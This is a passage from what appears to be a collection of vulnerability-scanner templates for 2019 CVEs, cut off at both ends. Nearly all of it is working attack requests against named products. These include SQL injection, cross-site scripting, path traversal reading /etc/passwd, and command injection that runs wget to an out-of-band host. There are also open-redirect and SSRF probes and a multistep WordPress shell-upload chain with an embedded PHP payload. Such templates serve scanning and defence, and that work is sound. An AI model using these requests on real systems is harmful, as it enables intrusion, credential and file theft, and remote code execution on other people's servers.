/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=0)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n","GET /catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%20OR%20(SELECT%201%20UNION%20SELECT%202%20FROM%20DUAL%20WHERE%201=1)%20--%20- HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"stop-at-first-match":true,"matchers":[{"type":"dsl","name":"time-based","dsl":["duration_1>=8","contains(content_type_1, \"application/json\")"],"condition":"and"},{"type":"dsl","name":"blind-based","dsl":["contains(content_type_2, \"application/json\") && contains(content_type_3, \"application/json\")","status_code_2 == 200 && status_code_3 == 400","len(body_2) == 2 && len(body_3) == 2"],"condition":"and"}]}]},{"id":"CVE-2019-10092","info":{"name":"Apache HTTP Server <=2.4.39 -  HTML Injection/Partial Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5cgoogle.com/evil.html"],"matchers-condition":"and","matchers":[{"type":"word","words":["Proxy Error"]},{"type":"word","words":["<a href=\"/\\google.com/evil.html\">"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-17574","info":{"name":"Popup-Maker < 1.8.12 - Broken Authentication","severity":"critical"},"requests":[{"raw":["GET /?pum_action=tools_page_tab_system_info HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npopmake_action=popup_sysinfo&popmake-sysinfo=CVE-2019-17574\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["Popup Maker Configuration","Webserver Configuration"],"condition":"and"},{"type":"word","part":"body_2","words":["CVE-2019-17574"]}]}]},{"id":"CVE-2019-7254","info":{"name":"eMerge E3 1.00-06 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?c=../../../../../../etc/passwd%00","{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7192","info":{"name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /photo/p/api/album.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\na=setSlideshow&f=qsamplealbum\n","GET /photo/slideshow.php?album={{album_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /photo/p/api/video.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nalbum={{album_id}}&a=caption&ac={{access_code}}&f=UMGObv&filename=.%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body_3","regex":["admin:.*:0:0:"]},{"type":"word","part":"header_3","words":["video/subtitle"]},{"type":"status","part":"header_3","status":[200]}],"extractors":[{"type":"regex","name":"album_id","part":"body_1","group":1,"regex":["<output>([a-zA-Z]+)<\\/output>"],"internal":true},{"type":"regex","name":"access_code","part":"body_2","group":1,"regex":["encodeURIComponent\\('([A-Za-z0-9]+)'\\)"],"internal":true}]}]},{"id":"CVE-2019-2578","info":{"name":"Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0  - Broken Access Control","severity":"high"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"body","regex":["<script[\\d\\D]*<throwexception/>"]}]}]},{"id":"CVE-2019-7219","info":{"name":"Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webapp/?fccc%27\\%22%3E%3Csvg/onload=alert(/xss/)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(/xss/)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18371","info":{"name":"Xiaomi Mi WiFi R3G Routers - Local file Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12985","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/ping HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20183","info":{"name":"Simple Employee Records System 1.0 - Unrestricted File Upload","severity":"high"},"requests":[{"raw":["POST /dashboard/uploadID.php HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337\n\n-----------------------------5825462663702204104870787337\nContent-Disposition: form-data; name=\"employee_ID\"; filename=\"poc.php\"\nContent-Type: image/png\n\n<?php\necho md5('CVE-2019-20183');\nunlink(__FILE__);\n?>\n-----------------------------5825462663702204104870787337--\n","GET /uploads/employees_ids/{{endpoint}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["1ad0d710225c472cb7396b3c1d97e4dd"]}],"extractors":[{"type":"regex","name":"endpoint","regex":["(?:[a-zA-Z0-9+\\/])*_poc.php"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-0221","info":{"name":"Apache Tomcat - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/printenv.shtml?{{url_encode(payload)}}","{{BaseURL}}/ssi/printenv.shtml?{{url_encode(payload)}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["QUERY_STRING_UNESCAPED={{payload}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3912","info":{"name":"LabKey Server Community Edition <18.3.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-13392","info":{"name":"MindPalette NateMail 3.0.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /NateMail.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nrecipient=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-5418","info":{"name":"Rails File Content Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Accept":"../../../../../../../../etc/passwd{{"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-11510","info":{"name":"Pulse Connect Secure SSL VPN Arbitrary File Read","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7275","info":{"name":"Optergy Proton/Enterprise Building Management System - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/updating.jsp?url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-16123","info":{"name":"PilusCart <=1.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/catalog.php?filename=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15501","info":{"name":"L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","LISTSERV"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8903","info":{"name":"Totaljs <3.2.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apache2.conf"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14251","info":{"name":"T24 Web Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd","{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3398","info":{"name":"Atlassian Confluence Download Attachments - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log%2Bin&os_destination=\n","GET /pages/createpage.action HTTP/1.1\nHost: {{Hostname}}\n","POST /plugins/drag-and-drop/upload.action?draftId={{draftID}}&filename=../../../../../../opt/atlassian/confluence/confluence/pages/{{randstr}}.jsp&size=8&mimeType=text%2Fplain&atl_token={{csrftoken}} HTTP/1.1\nHost: {{Hostname}}\n\n${{{num1}}*{{num2}}}\n","GET /pages/downloadallattachments.action?pageId={{draftID}} HTTP/1.1\nHost: {{Hostname}}\n","GET /pages/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_5","words":["{{result}}"]}],"extractors":[{"type":"regex","name":"csrftoken","group":1,"regex":["name=\"atlassian\\-token\" content=\"([a-z0-9]+)\"> "],"internal":true,"part":"body"},{"type":"regex","name":"draftID","group":1,"regex":["ta name=\"ajs\\-draft\\-id\" content=\"([0-9]+)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-12986","info":{"name":"Citrix SD-WAN Center - Remote Command Injection","severity":"critical"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /Collector/diagnostics/trace_route HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nipAddress=%60/bin/wget+http://{{interactsh-url}}%60\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<title>Citrix SD-WAN</title>\")"]},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10232","info":{"name":"Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1","{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["-MariaDB-","Start unlock script"],"condition":"and"}],"extractors":[{"type":"regex","regex":["[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"],"part":"body"}]}]},{"id":"CVE-2019-11580","info":{"name":"Atlassian Crowd and Crowd Data Center - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /crowd/admin/uploadplugin.action HTTP/2\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: multipart/mixed; boundary=----------------------------f15fe87e95a7\nExpect: 100-continue\n\n------------------------------f15fe87e95a7\nContent-Disposition: form-data; name=\"file_cdl\"; filename=\"rce.jar\"\nContent-Type: application/octet-stream\n\n{{plugin}}\n------------------------------f15fe87e95a7--\n","GET /crowd/plugins/servlet/exp HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body_2","words":["CVE-2019-11580"]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16097","info":{"name":"Harbor <=1.82.0 - Privilege Escalation","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/users"],"body":"{\"username\": \"testpoc\", \"has_admin_role\": true, \"password\": \"TestPoc!\", \"email\": \"testpoc@interact.sh\", \"realname\": \"poc\"}\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["username has already been used","Location: /api/users/"],"condition":"or"},{"type":"status","status":[201,409],"condition":"or"}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-9733","info":{"name":"JFrog Artifactory 6.7.3 - Admin Login Bypass","severity":"critical"},"requests":[{"raw":["POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nX-Requested-With: artUI\nX-Forwarded-For: 127.0.0.1\nRequest-Agent: artifactoryUI\nContent-Type: application/json\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/artifactory/webapp/\n\n{\"user\":\"access-admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\": \"access-admin\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15811","info":{"name":"DomainMOD <=4.13.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"value=\\\"\\\"onfocus=\\\"alert(document.domain)\\\"autofocus=\")","contains(body_2, \"DomainMOD\")"],"condition":"and"}]}]},{"id":"CVE-2019-8943","info":{"name":"WordPress Core 5.0.0 - Crop-image Shell Upload","severity":"medium"},"requests":[{"raw":["GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["WordPress</title>","/wp-login.php?action=lostpassword\">Lost your password?</a>","<form name=\"loginform\" id=\"loginform\" action=\"{{BaseURL}}/wp-login.php\" method=\"post\">"],"condition":"or","internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Login\n"],"matchers":[{"type":"dsl","dsl":["contains_all(header,\"wordpress_logged_in\",\"/wp-admin\")","status_code == 302"],"condition":"and","internal":true}]},{"raw":["GET /wp-content/themes/{{theme_name}}/style.css HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","len(body) > 0","content_type == 'text/css'"],"condition":"and","internal":true}]},{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"theme_name","group":1,"regex":["/wp-content/themes/([^/]+)/"],"internal":true}]},{"raw":["GET /wp-admin/media-new.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"wpnonce","attribute":"value","xpath":["//input[@id='_wpnonce'][1]"],"internal":true}]},{"raw":["POST /wp-admin/async-upload.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=rexvfybxrhgfrfrjv\n\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"name\"\n\n{{image_filename}}.jpg\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"action\"\n\nupload-attachment\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"_wpnonce\"\n\n{{wpnonce}}\n--rexvfybxrhgfrfrjv\nContent-Disposition: form-data; name=\"async-upload\"; filename=\"{{image_filename}}.jpg\"\nContent-Type: image/jpeg\n\n{{hex_decode(\"ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400103c3f3d60245f4745545b305d603b3f3e1c020000020004fffe003b43524541544f523a2067642d6a7065672076312e3020287573696e6720494a47204a50454720763830292c207175616c697479203d2038320affdb0043000604040504040605050506060607090e0909080809120d0d0a0e1512161615121414171a211c17181f1914141d271d1f2223252525161c292c28242b21242524ffdb00430106060609080911090911241814182424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424ffc000110800c0010603012200021101031101ffc4001f0000010501010101010100000000000000000102030405060708090a0bffc400b5100002010303020403050504040000017d01020300041105122131410613516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4f5f6f7f8f9faffda000c03010002110311003f003c3f3d60245f4745545b305d603b3f3e\")}}\n--rexvfybxrhgfrfrjv--\n"],"extractors":[{"type":"json","part":"body","name":"image_id","json":[".data.id"],"internal":true},{"type":"json","part":"body","name":"update_nonce","json":[".data.nonces.update"],"internal":true},{"type":"json","part":"body","name":"filename","json":[".data.filename"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=query-attachments&post_id=0&query%5bitem%5d=43&query%5borderby%5d=date&query%5border%5d=DESC&query%5bposts_per_page%5d=40&query%5bpaged%5d=1\n"],"extractors":[{"type":"json","part":"body","name":"ajax_nonce","json":[".data[0].nonces.edit"],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=image-editor&_ajax_nonce={{ajax_nonce}}&postid={{image_id}}&history=%5b%7b%22c%22%3a%7b%22x%22%3a0%2c%22y%22%3a0%2c%22w%22%3a400%2c%22h%22%3a300%7d%7d%5d&target=all&context=&do=save\n"],"extractors":[{"type":"regex","name":"image_filename","part":"body","group":1,"regex":["\\/([^\\/]+-e\\d+)-"],"internal":true}]},{"raw":["POST /wp-admin/post.php?post={{image_id}}&action=edit HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"extractors":[{"type":"xpath","name":"wpnonce2","attribute":"value","xpath":["//input[@id='_wpnonce'][1]"],"internal":true}]},{"raw":["POST /wp-admin/post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/x\n"],"matchers":[{"type":"status","status":[302],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300\n"],"extractors":[{"type":"json","part":"body","json":[".data.filename"],"internal":true}]},{"raw":["POST /wp-admin/post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/../../../../themes/{{theme_name}}/{{randstr}}\n"],"matchers":[{"type":"status","status":[302],"internal":true}]},{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300\n"],"extractors":[{"type":"json","part":"body","name":"cropped_image_filename","json":[".data.filename"],"internal":true}]},{"raw":["POST /wp-admin/post-new.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"extractors":[{"type":"xpath","name":"wpnonce3","attribute":"value","xpath":["//input[@id='_wpnonce'][1]"],"internal":true},{"type":"regex","name":"post_id","part":"body","group":1,"regex":["\"post\":{\"id\":(\\w+),"],"internal":true}]},{"raw":["POST /wp-admin/post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 